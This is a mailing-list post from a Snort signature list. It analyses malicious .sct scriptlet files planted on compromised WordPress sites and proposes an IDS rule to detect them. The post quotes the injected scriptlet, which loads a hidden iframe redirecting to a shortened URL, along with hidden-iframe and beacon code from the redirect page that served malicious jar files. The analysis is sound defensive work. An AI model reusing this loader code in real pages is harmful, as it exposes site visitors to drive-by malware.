[Snort-sigs] Malicious scriptlets

James Lay jlay at ...3266...
Thu May 16 13:16:32 EDT 2013


So I've now seen two of these so far.  Compromised site gets a bonus 
file...a .sct scriptlet file.  These files had the initial header of the 
Sizzle CSS Engine:

badsite1.com/wp-includes/js/jquery/ie.sct
badsite2.biz/wp-content/themes/2012/css/themes.sct

/*
  * Sizzle CSS Selector Engine - v0.9.3
  *  Copyright 2009, The Dojo Foundation
  *  Released under the MIT, BSD, and GPL Licenses.
  *  More information: http://sizzlejs.com/
  */

but then goes on with the below (spaces added):

<s c r i p t l e t><implements 
type=behavior></implements><script>xchk='_';xurl='\x08//goo.gl/24vi1';(xifr=document.createElement('iframe')).style.display='none';document.body.appendChild(xifr);with(xifr){id='xfid';addBehavior('#default#userData');load(xchk);if(!getAttribute(xchk)){setAttribute(xchk,'_');save(xchk);expires=(new 
Date((new 
Date()).getTime()+6e8)).toUTCString();src=xurl;}}</script></scriptlet>

the shortend goo.gl link points to bls.pw/ which apparently is 
"missing" an index.* page (hat tip to ET for detecting the .pw domain 
jazz).  The response is just as icky (snippets):

<t i t l e>404 Not Found</title>
<snip>
.<h1>Not Found</h1>
.<p>The requested URL / was not found on this server.</p>
.<p>Additionally, a 404 Not Found error was encountered while trying to 
use an ErrorDocument to handle the request.</p>
.<!--[if gt IE 7]>
.<s c r i p t type="text/javascript">
.setTimeout('new Image().src="//goo.gl/9yBTe"',2500);
<snip>
...innerHTML+='<iframe/src="https://
goo.gl/1hpWA"style="position:absolute;left:-4200px;"onload="new 
Image().src=\'//goo.gl/hNVXP\'"></iframe>';
...innerHTML+='<iframe/src="https://
goo.gl/EVVWF"style="position:absolute;left:-4200px;"></iframe>';

The shortened links are currently serving up nasty jar files:

https://www.virustotal.com/en/file/c4d37ef0e60e940527061444e1575a8e555dbe91ccb7e0fb5469a9c08f94de0f/analysis/1368718511/

Sig below should catch the response from the compromised server:

alert tcp $EXTERNAL_NET $HTTP_PORTS -> $HOME_NET any 
(msg:"INDICATOR-COMPROMISED Scriptlet file with iframe redirect"; 
flow:from_server,established; file_data; content:"<scriptlet"; 
content:"url="; content:"iframe"; metadata:policy balanced-ips drop, 
policy security-ips drop, service http; metadata:ruleset community; 
classtype:trojan-activity; sid:10000060; rev:1)

Anything to help make the sig better would be much appreciated.

James




More information about the Snort-sigs mailing list